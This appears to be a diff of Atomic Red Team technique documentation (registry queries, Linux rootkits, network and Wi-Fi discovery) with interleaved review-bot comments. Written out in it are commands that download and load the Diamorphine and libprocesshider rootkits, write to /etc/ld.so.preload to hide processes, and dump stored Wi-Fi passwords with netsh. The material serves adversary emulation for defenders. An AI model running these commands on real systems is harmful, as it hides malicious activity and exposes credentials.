#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -95,23 +123,36 @@ Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
```
### Atomic Test #3: Enumerate COM Objects in Registry with Powershell
<br/>
<br/>
## Atomic Test #3 - Enumerate COM Objects in Registry with Powershell
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
**Supported Platforms:** Windows
**auto_generated_guid:** `0d80d088-a84c-4353-af1a-fc8b439f1564`
#### Inputs
**auto_generated_guid:** 0d80d088-a84c-4353-af1a-fc8b439f1564
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | File to output list of COM objects to | string | $env:temp&#92;T1592.002Test1.txt|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
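Review bot: the `output_file` default for Test #3, `$env:temp\T1592.002Test1.txt`, names a different technique (T1592.002) than this T1012 file; rename it in the source YAML (for example `T1012Test3.txt`) so the artifact written to disk is attributable to the test that created it when reviewing endpoint telemetry.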
@@ -125,54 +166,101 @@ $handle | get-member -erroraction silentlycontinue | out-file #{output_file} -ap
$position += 1} catch{}}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
remove-item #{output_file} -force -erroraction silentlycontinue
remove-item $env:temp\clsids.txt -force -erroraction silentlycontinue
```
### Atomic Test #4: Reg query for AlwaysInstallElevated status
<br/>
<br/>
## Atomic Test #4 - Reg query for AlwaysInstallElevated status
The reg query commands allows to check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine thus allowing a regular user to install a Microsoft Windows Installer package with system level privileges. This can be abused by an attacker to escalate privileges in the host to SYSTEM level.
**Supported Platforms:** Windows
**auto_generated_guid:** `6fb4c4c5-f949-4fd2-8af5-ddbc61595223`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 6fb4c4c5-f949-4fd2-8af5-ddbc61595223
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
### Atomic Test #5: Check Software Inventory Logging (SIL) status via Registry
<br/>
<br/>
## Atomic Test #5 - Check Software Inventory Logging (SIL) status via Registry
Microsoft's Software Inventory Logging (SIL) collects information about software installed per host basis. Adversary can use such logs to passively
check for existence of software of interest to them. Status of SIL can be checked via registry.
[Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
**Supported Platforms:** Windows
**auto_generated_guid:** `5c784969-1d43-4ac7-8c3d-ed6d025ed10d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 5c784969-1d43-4ac7-8c3d-ed6d025ed10d
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
```
### Atomic Test #6: Inspect SystemStartOptions Value in Registry
<br/>
<br/>
## Atomic Test #6 - Inspect SystemStartOptions Value in Registry
The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings. key is.
**Supported Platforms:** Windows
**auto_generated_guid:** `96257079-cdc1-4aba-8705-3146e94b6dce`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 96257079-cdc1-4aba-8705-3146e94b6dce
#### Attack Commands: Run with `command_prompt`!
```cmd
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
```
<br/>
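Review bot: the Test #6 description ends in the dangling fragment "key is." after "identifying security-related settings."; drop it in the source YAML. In Test #4, "The reg query commands allows to check" should read "The reg query commands allow checking". Test #4 is also flagged "Elevation Required" although `reg query` against these Policies keys under HKCU and HKLM is readable by standard users; confirm the flag is intended, since it changes how the runner executes the test.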
+95 -63
@@ -1,63 +1,70 @@
# T1014 - Rootkit
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
<blockquote>
## Description from ATT&CK
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
> Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
>
> Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
>
> Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
[Source](https://attack.mitre.org/techniques/T1014)
Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Loadable Kernel Module based Rootkit](#atomic-test-1-loadable-kernel-module-based-rootkit)
- [Atomic Test #2: Loadable Kernel Module based Rootkit](#atomic-test-2-loadable-kernel-module-based-rootkit)
- [Atomic Test #3: dynamic-linker based rootkit (libprocesshider)](#atomic-test-3-dynamic-linker-based-rootkit-libprocesshider)
- [Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4-loadable-kernel-module-based-rootkit-diamorphine)
- [Atomic Test #1 - Loadable Kernel Module based Rootkit](#atomic-test-1---loadable-kernel-module-based-rootkit)
### Atomic Test #1: Loadable Kernel Module based Rootkit
- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
<br/>
## Atomic Test #1 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** `dfb50072-e45a-4c75-a17e-a484809c8553`
#### Inputs
**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
| rootkit_name | Module name | string | T1014|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo insmod #{rootkit_path}/#{rootkit_name}.ko
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
sudo apt install make
sudo apt install gcc
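Review bot: the Get Prereq commands `sudo apt install make` and `sudo apt install gcc` prompt for confirmation and will hang a non-interactive runner; use `sudo apt install -y make gcc`, and since the same step assumes a Debian-derived system, guard it (or document the assumption) for hosts without apt.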
@@ -69,47 +76,54 @@ mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014
```
### Atomic Test #2: Loadable Kernel Module based Rootkit
<br/>
<br/>
## Atomic Test #2 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** `75483ef8-f10f-444a-bf02-62eb0e48db6f`
#### Inputs
**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_name | Module name | string | T1014|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo modprobe #{rootkit_name}
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
sudo apt install make
sudo apt install gcc
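Review bot: the Test #2 dependency description says the module must exist at `#{rootkit_source_path}/#{rootkit_name}.ko`, but the Check Prereq command tests `/lib/modules/$(uname -r)/#{rootkit_name}.ko` and the cleanup removes that same path; align the description with the checked location so a failed prerequisite points the operator to the right file. The `apt install` lines here have the same missing `-y` as in Test #1.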
@@ -121,48 +135,55 @@ sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
```
### Atomic Test #3: dynamic-linker based rootkit (libprocesshider)
<br/>
<br/>
## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
**Supported Platforms:** Linux
**auto_generated_guid:** `1338bf0c-fd0c-48c0-9e65-329f18e2c0d3`
#### Inputs
**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| repo | Url of the github repo zip | string | https://github.com/gianlucaborello/libprocesshider/|
| rev | Revision of the github repo zip | string | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
| library_path | Full path of the library to add to ld.so.preload | string | /usr/local/lib/libprocesshider.so|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The preload library must exist on disk at specified location (#{library_path})
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
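Review bot: the Test #3 Check Prereq only verifies `#{library_path}`, but the attack command also executes `/usr/local/bin/evil_script.py`, which is created by the Get Prereq step; add it to the check (`[ -f #{library_path} ] && [ -x /usr/local/bin/evil_script.py ]`) so a partially provisioned host fails the prerequisite instead of the attack step. The attack also writes to `/etc/ld.so.preload` via `tee -a` without a duplicate check, so repeated runs append the same line more than once.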
@@ -171,23 +192,34 @@ cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py
```
### Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine)
<br/>
<br/>
## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
Loads Diamorphine kernel module, which hides itself and a processes.
**Supported Platforms:** Linux
**auto_generated_guid:** `0b996469-48c6-46e2-8155-a17f8b6c2247`
#### Inputs
**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| repo | Url of the diamorphine github repo | string | https://github.com/m0nad/Diamorphine/|
| rev | Revision of the github repo zip | string | 898810523aa2033f582a4a5903ffe453334044f9|
| rootkit_name | Module name | string | diamorphine|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo modprobe #{rootkit_name}
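Review bot: the Test #4 description "hides itself and a processes" should read "hides itself and a process" (or "and processes"); fix it in the source YAML so the generated markdown inherits the correction.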
@@ -197,8 +229,7 @@ kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
kill -63 1
sudo modprobe -r #{rootkit_name}
@@ -206,18 +237,15 @@ sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
@@ -226,3 +254,7 @@ sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
```
<br/>
+100 -30
@@ -1,118 +1,188 @@
# T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/001)
<blockquote>
## Description from ATT&CK
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
> Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
>
> Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
[Source](https://attack.mitre.org/techniques/T1016/001)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Check internet connection using ping Windows](#atomic-test-1-check-internet-connection-using-ping-windows)
- [Atomic Test #2: Check internet connection using ping freebsd, linux or macos](#atomic-test-2-check-internet-connection-using-ping-freebsd-linux-or-macos)
- [Atomic Test #3: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)](#atomic-test-3-check-internet-connection-using-test-netconnection-in-powershell-icmp-ping)
- [Atomic Test #4: Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)](#atomic-test-4-check-internet-connection-using-test-netconnection-in-powershell-tcp-http)
- [Atomic Test #5: Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)](#atomic-test-5-check-internet-connection-using-test-netconnection-in-powershell-tcp-smb)
- [Atomic Test #1 - Check internet connection using ping Windows](#atomic-test-1---check-internet-connection-using-ping-windows)
### Atomic Test #1: Check internet connection using ping Windows
- [Atomic Test #2 - Check internet connection using ping freebsd, linux or macos](#atomic-test-2---check-internet-connection-using-ping-freebsd-linux-or-macos)
- [Atomic Test #3 - Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)](#atomic-test-3---check-internet-connection-using-test-netconnection-in-powershell-icmp-ping)
- [Atomic Test #4 - Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)](#atomic-test-4---check-internet-connection-using-test-netconnection-in-powershell-tcp-http)
- [Atomic Test #5 - Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)](#atomic-test-5---check-internet-connection-using-test-netconnection-in-powershell-tcp-smb)
<br/>
## Atomic Test #1 - Check internet connection using ping Windows
Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
**Supported Platforms:** Windows
**auto_generated_guid:** `e184b6bd-fb28-48aa-9a59-13012e33d7dc`
#### Inputs
**auto_generated_guid:** e184b6bd-fb28-48aa-9a59-13012e33d7dc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ping_target | target of the ping | url | 8.8.8.8|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
ping -n 4 #{ping_target}
```
### Atomic Test #2: Check internet connection using ping freebsd, linux or macos
<br/>
<br/>
## Atomic Test #2 - Check internet connection using ping freebsd, linux or macos
Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** `be8f4019-d8b6-434c-a814-53123cdcc11e`
#### Inputs
**auto_generated_guid:** be8f4019-d8b6-434c-a814-53123cdcc11e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ping_target | target of the ping | url | 8.8.8.8|
#### Attack Commands: Run with `bash`!
#### Attack Commands: Run with `bash`!
```bash
ping -c 4 #{ping_target}
```
### Atomic Test #3: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
<br/>
<br/>
## Atomic Test #3 - Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).
**Supported Platforms:** Windows
**auto_generated_guid:** `f8160cde-4e16-4c8b-8450-6042d5363eb0`
#### Inputs
**auto_generated_guid:** f8160cde-4e16-4c8b-8450-6042d5363eb0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target | target of the request | string | 8.8.8.8|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Test-NetConnection -ComputerName #{target}
```
### Atomic Test #4: Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
<br/>
<br/>
## Atomic Test #4 - Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `7c35779d-42ec-42ab-a283-6255b28e9d68`
#### Inputs
**auto_generated_guid:** 7c35779d-42ec-42ab-a283-6255b28e9d68
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target | target of the request | string | www.google.com|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target}
```
### Atomic Test #5: Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
<br/>
<br/>
## Atomic Test #5 - Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.
**Supported Platforms:** Windows
**auto_generated_guid:** `d9c32b3b-7916-45ad-aca5-6c902da80319`
#### Inputs
**auto_generated_guid:** d9c32b3b-7916-45ad-aca5-6c902da80319
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target | target of the request | string | 8.8.8.8|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Test-NetConnection -CommonTCPPort SMB -ComputerName #{target}
```
<br/>
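Review bot: the `#### Attack Commands: Run with \`powershell\`!` line shows up as both removed and re-added with identical visible text in each of tests 3, 4 and 5 here, so whatever differs is invisible, most likely trailing whitespace or a line ending. Have the Python generator strip trailing whitespace on every emitted line (or reproduce the old line exactly) so these lines stop registering as modified; otherwise every regeneration carries the same noise into review. The substantive changes in this hunk, test headings demoted from `##` to `###`, the GUID wrapped in backticks, `#### Inputs` without the trailing colon, and the `<br/>` separators dropped, are applied consistently across the three tests.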
+27 -11
@@ -1,30 +1,46 @@
# T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
<blockquote>
## Description from ATT&CK
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
> Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
>
> Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
>
> On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
[Source](https://attack.mitre.org/techniques/T1016/002)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1-enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
- [Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1---enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
### Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
<br/>
## Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
**Supported Platforms:** Windows
**auto_generated_guid:** `53cf1903-0fa7-4177-ab14-f358ae809eec`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 53cf1903-0fa7-4177-ab14-f358ae809eec
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh wlan show profile * key=clear
```
<br/>
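Review bot: `[Source](https://attack.mitre.org/techniques/T1016/002)` is emitted directly after the last `> On Linux, ...` line of the new blockquote; unless the generator writes an empty line between them, CommonMark's lazy-continuation rule folds that line into the quoted paragraph and the link renders inside the quote instead of as the attribution under it. Emit a blank line before `[Source](...)` and again before the following `## Atomic Tests` heading. The rest of the hunk is fine: the `<blockquote>` HTML becomes `>` prefixes, and the new `### Atomic Test #1:` heading matches its rewritten anchor `#atomic-test-1-enumerate-stored-wi-fi-profiles-and-passwords-via-netsh`.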
+187 -76
@@ -1,38 +1,55 @@
# T1016 - System Network Configuration Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
<blockquote>
## Description from ATT&CK
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
> Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
>
> Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
>
> Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
[Source](https://attack.mitre.org/techniques/T1016)
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
</blockquote>
## Atomic Tests
- [Atomic Test #1: System Network Configuration Discovery on Windows](#atomic-test-1-system-network-configuration-discovery-on-windows)
- [Atomic Test #2: List Windows Firewall Rules](#atomic-test-2-list-windows-firewall-rules)
- [Atomic Test #3: System Network Configuration Discovery](#atomic-test-3-system-network-configuration-discovery)
- [Atomic Test #4: System Network Configuration Discovery (TrickBot Style)](#atomic-test-4-system-network-configuration-discovery-trickbot-style)
- [Atomic Test #5: List Open Egress Ports](#atomic-test-5-list-open-egress-ports)
- [Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6-adfind---enumerate-active-directory-subnet-objects)
- [Atomic Test #7: Qakbot Recon](#atomic-test-7-qakbot-recon)
- [Atomic Test #8: List macOS Firewall Rules](#atomic-test-8-list-macos-firewall-rules)
- [Atomic Test #9: DNS Server Discovery Using nslookup](#atomic-test-9-dns-server-discovery-using-nslookup)
- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows)
### Atomic Test #1: System Network Configuration Discovery on Windows
- [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules)
- [Atomic Test #3 - System Network Configuration Discovery](#atomic-test-3---system-network-configuration-discovery)
- [Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)](#atomic-test-4---system-network-configuration-discovery-trickbot-style)
- [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports)
- [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects)
- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon)
